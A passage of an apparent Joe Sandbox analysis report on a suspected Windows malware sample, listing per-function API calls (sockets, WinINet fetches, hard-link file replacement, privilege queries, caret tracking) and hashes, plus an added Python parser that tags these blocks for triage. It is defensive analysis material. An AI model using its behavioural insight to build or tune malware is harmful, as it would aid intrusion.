                                                        • Instruction Fuzzy Hash: 5E415175740210AFEB90AF28CC8AF6A77E4EF45B14F04C45CFA599F2D2DA789D008791
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0084F910), ref: 008364A7
                                                        • _strlen.LIBCMT ref: 008364D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: 94daa139f90f5f4dbd93ea3c4996def6b808194e71ba515e2243d57a930b43d3
                                                        • Instruction ID: eb017b340555365abd6d44297034504d41519731394906e5e8a6a7a8254be064
                                                        • Opcode Fuzzy Hash: 94daa139f90f5f4dbd93ea3c4996def6b808194e71ba515e2243d57a930b43d3
                                                        • Instruction Fuzzy Hash: 2E416071600108ABCB14EBA8DC99FAEB7A9FF44310F14816DF91AD7292EB34AD50C791
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0082B89E
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0082B8C4
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0082B8E9
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0082B915
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: a77f911e7bcab26aeeeddabb712bd56dc6ec5a22f6088513c16960bb36d7d65f
                                                        • Instruction ID: ba1b3f646cd29ffe568c1b1d91f3ddb2d7074ea7095ba058dabc4167dc4ee674
                                                        • Opcode Fuzzy Hash: a77f911e7bcab26aeeeddabb712bd56dc6ec5a22f6088513c16960bb36d7d65f
                                                        • Instruction Fuzzy Hash: D341F439A00620DFCB51EF15C588A59BBE1FF4A710F09809CEE4A9B362CB34ED41CB91
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007F61FB
                                                        • __isleadbyte_l.LIBCMT ref: 007F6229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007F6257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007F628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 21a816f0bde99cedcc5beb17c1fbd513b7f3d11dd5a75faeb0fa9c8f10e8bae5
                                                        • Instruction ID: fca053f37f464e7f4e66c8e2b901ad903ade332cc93e022eb6e837d0c4e00d18
                                                        • Opcode Fuzzy Hash: 21a816f0bde99cedcc5beb17c1fbd513b7f3d11dd5a75faeb0fa9c8f10e8bae5
                                                        • Instruction Fuzzy Hash: BA31CF3060024EEFDF218F65CC48BBA7BB9FF42320F154028EA24972A1E735E950DB90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00844F02
                                                          • Part of subcall function 00823641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082365B
                                                          • Part of subcall function 00823641: GetCurrentThreadId.KERNEL32 ref: 00823662
                                                          • Part of subcall function 00823641: AttachThreadInput.USER32(00000000,?,00825005), ref: 00823669
                                                        • GetCaretPos.USER32(?), ref: 00844F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 00844F4E
                                                        • GetForegroundWindow.USER32 ref: 00844F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: f10fea6f5d01887657b7e8e1afac67a0eac5dd34ec8bee3e05e77005a6d4027a
                                                        • Instruction ID: 1a27c3a5bcb414ff3e7f059bdda58c2398a8426a3014d2bb89de1c29169722a7
                                                        • Opcode Fuzzy Hash: f10fea6f5d01887657b7e8e1afac67a0eac5dd34ec8bee3e05e77005a6d4027a
                                                        • Instruction Fuzzy Hash: A6311A71D00208AFDB00EFA9C885EEFB7F9EF99300B10406AE515E7201EA759E45CBA1
                                                        APIs
                                                          • Part of subcall function 0081810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00818121
                                                          • Part of subcall function 0081810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0081812B
                                                          • Part of subcall function 0081810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0081813A
                                                          • Part of subcall function 0081810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00818141
                                                          • Part of subcall function 0081810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00818157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008186A3
                                                        • _memcmp.LIBCMT ref: 008186C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008186FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00818703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 307289fadd98cc4f76bfe76a59663daa300eafdbbd53e05e356d85f8050342cb
                                                        • Instruction ID: efa7b26900d10d9aa3b3c661942426f8fd445fb1a8acee00988eaee1ddf28411
                                                        • Opcode Fuzzy Hash: 307289fadd98cc4f76bfe76a59663daa300eafdbbd53e05e356d85f8050342cb
                                                        • Instruction Fuzzy Hash: 06216972E00108EFDB10DFA8C95ABEEB7B8FF55304F154059E444AB241DB31AE45CB90
                                                        APIs
                                                        • __setmode.LIBCMT ref: 007E09AE
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00827896,?,?,00000000), ref: 007C5A2C
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00827896,?,?,00000000,?,?), ref: 007C5A50
                                                        • _fprintf.LIBCMT ref: 007E09E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00815DBB
                                                          • Part of subcall function 007E4AAA: _flsall.LIBCMT ref: 007E4AC3
                                                        • __setmode.LIBCMT ref: 007E0A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 8c0d7bfb670d6bc5725ca652f51f42e39d77863a8109fa723ad13aa3b4cd193a
                                                        • Instruction ID: e8b892c569b66eea7026c4f4e4334bc4e275045c58a399d75a136c159e588d17
                                                        • Opcode Fuzzy Hash: 8c0d7bfb670d6bc5725ca652f51f42e39d77863a8109fa723ad13aa3b4cd193a
                                                        • Instruction Fuzzy Hash: F1115731505288EFCB04B6B6AC4EDBE77A8EF89320F10406DF20497182EE79589283E5
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008317A3
                                                          • Part of subcall function 0083182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0083184C
                                                          • Part of subcall function 0083182D: InternetCloseHandle.WININET(00000000), ref: 008318E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 31f9ce1e20f97a71e9097810a03d4507883c9eb26f414c7680b61203fb0e6560
                                                        • Instruction ID: cc30da70012b8a0c540f2c47c2505ac0ad27727a9774181a052da752acde34c2
                                                        • Opcode Fuzzy Hash: 31f9ce1e20f97a71e9097810a03d4507883c9eb26f414c7680b61203fb0e6560
                                                        • Instruction Fuzzy Hash: AC21CD36200605BFEF129F64CC05FBABBA9FF89B11F14402EFA05D6651DB719811ABE4
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0084FAC0), ref: 00823A64
                                                        • GetLastError.KERNEL32 ref: 00823A73
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00823A82
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0084FAC0), ref: 00823ADF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: 0cbef4e0887bcadccd2eb6fdce539a38ef10b8f6d385e998e2e3045bdd9a4024
                                                        • Instruction ID: 961e7c53a5138009b9bb1865dc2f75d8924200c6997c01c3142e1407fac37aba
                                                        • Opcode Fuzzy Hash: 0cbef4e0887bcadccd2eb6fdce539a38ef10b8f6d385e998e2e3045bdd9a4024
                                                        • Instruction Fuzzy Hash: 2721D634108625CF8300DF28D89596B77E4FE55368F104A2DF49AC72E2DB35DE86CB42
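The function blocks above are the raw material for triage: each one lists the Win32 imports a function in the 0x7C0000 image reaches (directly or through a subcall), plus the Instruction Fuzzy Hash used for similarity matching. The following parser is an added example and is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It reads the plain-text block layout shown on this page, resolves the "#N" ordinal imports that WSOCK32 functions appear under, and tags each function with the behaviour its call set implies (for instance socket(2,2,17) followed by setsockopt(SOL_SOCKET, SO_BROADCAST) as a UDP broadcast socket, or GetForegroundWindow + AttachThreadInput + GetCaretPos as caret tracking in another process's window). The ordinal table is assumed from the wsock32.dll export list and should be confirmed against the DLL on the analysis VM; the behaviour labels are this example's own heuristics, not Joe Sandbox signatures. The sample input is three blocks copied from the report above.

```python
"""Summarise Joe Sandbox 'Execution Graph' function blocks by their Win32 import set.

Added example, not part of the Joe Sandbox report: parses the plain-text block
layout (an 'APIs' list per function, then 'Memory Dump Source', 'Joe Sandbox IDA
Plugin' and 'Similarity'), resolves wsock32 ordinals and tags each function.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One call line: optional "Part of subcall function ADDR:" prefix, NAME.MODULE,
# optional "(args)" (args may themselves contain parentheses), then "ref: ADDR".
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]+)$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Imports the report prints as "#N" are wsock32.dll ordinals (assumption: taken from
# the DLL's export table; confirm against the copy on the analysis VM).
WSOCK32_ORDINALS = {16: "recv", 21: "setsockopt", 23: "socket"}


@dataclass
class Call:
    name: str
    module: str
    args: list[str]
    ref: str
    parent: str | None  # address of the subcall that makes this call, if any


@dataclass
class FunctionBlock:
    calls: list[Call] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)

    def find(self, name: str) -> Call | None:
        return next((c for c in self.calls if c.name == name), None)

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:            # a new 'APIs' header starts a new function
            section = line
            if section == "APIs":
                blocks.append(FunctionBlock())
            continue
        if not blocks or not line.startswith("•"):
            continue
        if section == "APIs" and (m := CALL_RE.match(line)):
            name, module = m["name"], m["module"]
            if name.startswith("#") and module == "WSOCK32":
                name = WSOCK32_ORDINALS.get(int(name[1:]), name)
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blocks[-1].calls.append(Call(name, module, args, m["ref"], m["parent"]))
        elif section == "Similarity":   # "• Key: value" lines
            key, _, value = line[1:].partition(":")
            blocks[-1].similarity[key.strip()] = value.strip()
    return blocks


def udp_broadcast(b: FunctionBlock) -> bool:
    """socket(AF_INET=2, SOCK_DGRAM=2, IPPROTO_UDP=17) then setsockopt(SOL_SOCKET=0xFFFF, SO_BROADCAST=0x20)."""
    s, so = b.find("socket"), b.find("setsockopt")
    return bool(s and so and s.args[:3] == ["00000002", "00000002", "00000011"]
                and so.args[1:3] == ["0000FFFF", "00000020"])


# (label, predicate): set rules fire when every name appears in the block, whether
# called directly or from one of its subcalls. Labels are this example's heuristics.
RULES = [
    ("udp broadcast socket", udp_broadcast),
    ("caret tracking in foreground window",
     lambda b: {"GetForegroundWindow", "GetCaretPos", "AttachThreadInput"} <= b.api_names()),
    ("hard-link file replacement", lambda b: {"CreateHardLinkW", "DeleteFileW"} <= b.api_names()),
    ("token integrity / privilege query",
     lambda b: {"GetTokenInformation", "LookupPrivilegeValueW"} <= b.api_names()),
    ("wininet url fetch", lambda b: {"InternetConnectW", "InternetOpenUrlW"} <= b.api_names()),
]


def summarise(text: str) -> list[dict]:
    return [{"fuzzy": b.similarity.get("Instruction Fuzzy Hash", "")[:16],
             "apis": sorted(b.api_names()),
             "tags": [label for label, pred in RULES if pred(b)]}
            for b in parse_blocks(text)]


# Constructed input: three blocks copied from the report above, in its own layout.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 008369D1
• WSAGetLastError.WSOCK32(00000000), ref: 008369E1
  • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00836A45
Memory Dump Source
• Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Similarity
• Instruction Fuzzy Hash: 5E415175740210AFEB90AF28CC8AF6A77E4EF45B14F04C45CFA599F2D2DA789D008791
APIs
• GetForegroundWindow.USER32 ref: 00844F02
  • Part of subcall function 00823641: AttachThreadInput.USER32(00000000,?,00825005), ref: 00823669
• GetCaretPos.USER32(?), ref: 00844F13
Similarity
• Instruction Fuzzy Hash: A6311A71D00208AFDB00EFA9C885EEFB7F9EF99300B10406AE515E7201EA759E45CBA1
APIs
  • Part of subcall function 0081810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00818121
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008186A3
• _memcmp.LIBCMT ref: 008186C6
Similarity
• Instruction Fuzzy Hash: 06216972E00108EFDB10DFA8C95ABEEB7B8FF55304F154059E444AB241DB31AE45CB90
"""

if __name__ == "__main__":
    for row in summarise(SAMPLE):
        print(row["fuzzy"], ", ".join(row["apis"]), "->", row["tags"] or "-")
```

Feed it the whole Execution Graph section (the parser ignores the Memory Dump Source and IDA Plugin lines) and the output is one row per function with its 16-character fuzzy-hash prefix, its resolved import set and any behaviour tags; the fuzzy hashes can then be matched against other reports from the same AutoIt-built family, while the tags point at the handful of functions worth opening in IDA first.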
                                                        APIs
                                                          • Part of subcall function 0081F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0081DCD3,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?), ref: 0081F0CB
                                                          • Part of subcall function 0081F0BC: lstrcpyW.KERNEL32(00000000,?,?,0081DCD3,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081F0F1
                                                          • Part of subcall function 0081F0BC: lstrcmpiW.KERNEL32(00000000,?,0081DCD3,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?), ref: 0081F122
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081DCEC
                                                        • lstrcpyW.KERNEL32(00000000,?,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081DD12
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081DD46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 940fb1e0c1b1127b2f57bc0ab2050d04606d8e106e83e69a80f8fc8a57662172
                                                        • Instruction ID: 6c10b2ccdefe7be638430ddac47c7e8737713c8347e65468e897763fff8c38ae
                                                        • Opcode Fuzzy Hash: 940fb1e0c1b1127b2f57bc0ab2050d04606d8e106e83e69a80f8fc8a57662172
                                                        • Instruction Fuzzy Hash: A911D33A200305EBCB259F34EC45EBA77ADFF45350B40802AF906CB2A1EB719880C7D1
                                                        APIs
                                                        • _free.LIBCMT ref: 007F5101
                                                          • Part of subcall function 007E571C: __FF_MSGBANNER.LIBCMT ref: 007E5733
                                                          • Part of subcall function 007E571C: __NMSG_WRITE.LIBCMT ref: 007E573A
                                                          • Part of subcall function 007E571C: RtlAllocateHeap.NTDLL(00EC0000,00000000,00000001,00000000,?,?,?,007E0DD3,?), ref: 007E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 79eda78fada05f82cb7a62059cd885d187b302006f9df2678249481aac799773
                                                        • Instruction ID: b2899bc667b8faeb0872792f892f18f81de651257eaf60f96e0a70e9f9348914
                                                        • Opcode Fuzzy Hash: 79eda78fada05f82cb7a62059cd885d187b302006f9df2678249481aac799773
                                                        • Instruction Fuzzy Hash: 2511C6B2502A5DEECB312FB5EC49B7E3798AF09361F200529FB0996352DF3C99409791
                                                        APIs
                                                        • _memset.LIBCMT ref: 007C44CF
                                                          • Part of subcall function 007C407C: _memset.LIBCMT ref: 007C40FC
                                                          • Part of subcall function 007C407C: _wcscpy.LIBCMT ref: 007C4150
                                                          • Part of subcall function 007C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C4160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 007C4524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007C4533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007FD4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: b214ba459b6a459febc060319a4cad8748a5d51031de0c2954df87e0a8cf773e
                                                        • Instruction ID: 06d684577e329428480372168cbf194bf29b7f1bde03e8e235b87b9f8d688807
                                                        • Opcode Fuzzy Hash: b214ba459b6a459febc060319a4cad8748a5d51031de0c2954df87e0a8cf773e
                                                        • Instruction Fuzzy Hash: 5D219574904798AFE7328B249855FF6BBEDAF06314F04009DE79A96242C7786D84CB51
                                                        APIs
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00827896,?,?,00000000), ref: 007C5A2C
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00827896,?,?,00000000,?,?), ref: 007C5A50
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00836399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008363A4
                                                        • _memmove.LIBCMT ref: 008363D1
                                                        • inet_ntoa.WSOCK32(?), ref: 008363DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: 2ad3c3ff03715bb7232bc355745b380dd65e3ce457e0977d3a3f852a3143b2a5
                                                        • Instruction ID: 0d3d318f0605a9a9363d0855296f1eb07e621542a47cb1d44230b11c346300fd
                                                        • Opcode Fuzzy Hash: 2ad3c3ff03715bb7232bc355745b380dd65e3ce457e0977d3a3f852a3143b2a5
                                                        • Instruction Fuzzy Hash: 94113D75500109EFCB04EBA4D94ADAEBBB8FF49310B14406DF605A7262DB35AE54CBA1
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00818B61
